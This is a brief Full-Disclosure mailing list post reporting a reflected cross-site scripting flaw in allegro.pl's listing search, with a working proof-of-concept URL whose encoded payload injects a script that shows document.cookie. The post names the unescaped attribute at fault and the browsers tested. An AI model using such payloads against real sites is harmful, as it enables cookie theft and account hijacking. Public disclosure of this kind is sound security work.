Hi All! I was looking for a 19" rack mount today and found this XSS instead: http://allegro.pl/listing/listing.php?string=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
it turns out to be a custom data-headline attribute that is not properly escaped tested on Firefox 20, Chrome and others need an xss filter bypass kacper _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/